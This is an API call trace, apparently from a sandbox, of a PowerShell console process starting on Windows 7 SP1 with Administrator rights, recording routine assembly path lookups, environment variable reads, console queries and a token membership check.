	[0220.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10e9b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0220.519] GetLastError () returned 0x0
	[0220.521] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10e9b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0220.521] GetLastError () returned 0x0
	[0220.525] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0220.525] GetLastError () returned 0xcb
	[0220.529] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0220.529] GetLastError () returned 0xcb
	[0220.529] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0220.529] GetLastError () returned 0xcb
	[0220.532] CoCreateGuid (in: pguid=0x10eed4 | out: pguid=0x10eed4*(Data1=0x4510c78c, Data2=0xff0f, Data3=0x4e9a, Data4=([0]=0xbb, [1]=0xb0, [2]=0x6, [3]=0xca, [4]=0xff, [5]=0x79, [6]=0xff, [7]=0xf2))) returned 0x0
	[0220.537] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0220.537] GetLastError () returned 0xcb
	[0220.743] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0220.744] GetLastError () returned 0xcb
	[0220.746] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0220.746] GetLastError () returned 0xcb
	[0220.755] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0220.756] GetLastError () returned 0x0
	[0220.758] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x10edb4 | out: lpConsoleScreenBufferInfo=0x10edb4) returned 1
	[0220.759] GetLastError () returned 0x0
	[0220.764] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0220.764] GetLastError () returned 0x0
	[0220.764] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x10edb4 | out: lpConsoleScreenBufferInfo=0x10edb4) returned 1
	[0220.765] GetLastError () returned 0x0
	[0220.766] GetVersionExW (in: lpVersionInformation=0x5090c8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x5090c8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0220.766] GetLastError () returned 0x0
	[0220.767] GetCurrentProcess () returned 0xffffffff
	[0220.767] GetLastError () returned 0x3f0
	[0220.769] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x10edc4 | out: TokenHandle=0x10edc4*=0x358) returned 1
	[0220.769] GetLastError () returned 0x3f0
	[0220.773] GetTokenInformation (in: TokenHandle=0x358, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x10ee1c | out: TokenInformation=0x0, ReturnLength=0x10ee1c) returned 0
	[0220.773] GetLastError () returned 0x7a
	[0220.775] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x511918
	[0220.775] GetLastError () returned 0x7a
	[0220.775] GetTokenInformation (in: TokenHandle=0x358, TokenInformationClass=0x8, TokenInformation=0x511918, TokenInformationLength=0x4, ReturnLength=0x10ee1c | out: TokenInformation=0x511918, ReturnLength=0x10ee1c) returned 1
	[0220.775] GetLastError () returned 0x7a
	[0220.779] DuplicateTokenEx (in: hExistingToken=0x358, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x10edd4 | out: phNewToken=0x10edd4*=0x350) returned 1
	[0220.779] GetLastError () returned 0x7f
	[0220.779] GetTokenInformation (in: TokenHandle=0x358, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x10ee1c | out: TokenInformation=0x0, ReturnLength=0x10ee1c) returned 0
	[0220.779] GetLastError () returned 0x7a
	[0220.780] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x5118f8
	[0220.780] GetLastError () returned 0x7a
	[0220.780] GetTokenInformation (in: TokenHandle=0x358, TokenInformationClass=0x8, TokenInformation=0x5118f8, TokenInformationLength=0x4, ReturnLength=0x10ee1c | out: TokenInformation=0x5118f8, ReturnLength=0x10ee1c) returned 1
	[0220.780] GetLastError () returned 0x7a
	[0220.781] CheckTokenMembership (in: TokenHandle=0x350, SidToCheck=0x29fd9c0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x10edb0 | out: IsMember=0x10edb0) returned 1
	[0220.781] GetLastError () returned 0x7a
	[0220.782] CloseHandle (hObject=0x350) returned 1
	[0220.782] GetLastError () returned 0x7a
	[0220.782] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10e8c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0220.782] GetLastError () returned 0x7a
	[0220.782] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10e874, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0220.782] GetLastError () returned 0x7a
	[0220.782] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10e874, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0220.782] GetLastError () returned 0x7a
	[0220.783] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10e874, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0220.783] GetLastError () returned 0x7a
	[0220.925] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10e8c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0220.925] GetLastError () returned 0x7a
	[0220.925] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10e874, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0220.925] GetLastError () returned 0x7a
	[0220.925] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10e874, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0220.925] GetLastError () returned 0x7a
	[0221.133] GetConsoleTitleW (in: lpConsoleTitle=0x528ed0, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0221.133] GetLastError () returned 0x7a
	[0221.153] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10e8f4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0221.153] GetLastError () returned 0x7a
	[0221.153] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10e8a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0221.153] GetLastError () returned 0x7a
	[0221.153] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10e8a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0221.153] GetLastError () returned 0x7a
	[0221.153] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10e8a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0221.153] GetLastError () returned 0x7a
	[0221.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10e8f4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0221.418] GetLastError () returned 0x7a
	[0221.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10e8a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0221.418] GetLastError () returned 0x7a
	[0221.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10e8a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0221.418] GetLastError () returned 0x7a
	[0221.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10e8f4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0221.418] GetLastError () returned 0x7a
	[0221.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10e8a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0221.418] GetLastError () returned 0x7a
	[0221.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10e8a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0221.418] GetLastError () returned 0x7a
	[0221.419] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10e908, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0221.419] GetLastError () returned 0x7a
	[0221.419] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10e8b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0221.419] GetLastError () returned 0x7a
	[0221.419] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10e8b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0221.419] GetLastError () returned 0x7a
	[0221.419] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10e8b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0221.419] GetLastError () returned 0x7a
	[0221.589] SetConsoleCtrlHandler (HandlerRoutine=0x26d384a, Add=1) returned 1
	[0221.589] GetLastError () returned 0x7a
	[0221.709] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0221.709] GetLastError () returned 0xcb
	[0221.716] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x350
	[0221.716] GetLastError () returned 0x0
	[0221.717] CoCreateGuid (in: pguid=0x10ede8 | out: pguid=0x10ede8*(Data1=0xb3f9fcec, Data2=0xf55e, Data3=0x41d8, Data4=([0]=0x9f, [1]=0x17, [2]=0x65, [3]=0xe5, [4]=0x51, [5]=0xd0, [6]=0x70, [7]=0x4f))) returned 0x0
	[0221.725] WinSqmIsOptedIn () returned 0x0
	[0221.726] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0221.726] GetLastError () returned 0xcb
	[0221.728] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0221.728] GetLastError () returned 0xcb
	[0221.728] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0221.728] GetLastError () returned 0xcb
	[0221.729] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0221.729] GetLastError () returned 0xcb
	[0221.730] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0221.730] GetLastError () returned 0xcb
	[0221.731] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0221.731] GetLastError () returned 0xcb
	[0221.732] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0221.732] GetLastError () returned 0xcb
	[0221.732] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0221.732] GetLastError () returned 0xcb
	[0221.736] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0221.736] GetLastError () returned 0xcb
	[0222.568] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0222.568] GetLastError () returned 0xcb
	[0222.568] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0222.568] GetLastError () returned 0xcb
	[0222.568] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0222.568] GetLastError () returned 0xcb
	[0222.568] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0222.568] GetLastError () returned 0xcb
	[0222.920] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0222.920] GetLastError () returned 0x3
	[0222.920] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0222.920] GetLastError () returned 0x3
	[0222.920] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0222.920] GetLastError () returned 0x3
	[0222.920] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0222.920] GetLastError () returned 0x3
	[0222.920] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0222.920] GetLastError () returned 0x3
	[0222.920] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0222.920] GetLastError () returned 0x3
	[0222.921] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0222.921] GetLastError () returned 0x3
	[0222.921] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0222.921] GetLastError () returned 0x3
	[0222.921] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0222.921] GetLastError () returned 0x3
	[0222.921] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0222.921] GetLastError () returned 0x3
	[0222.921] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0222.921] GetLastError () returned 0x3
	[0222.921] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0222.921] GetLastError () returned 0x3
	[0222.923] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x75
	[0222.923] GetLastError () returned 0x3
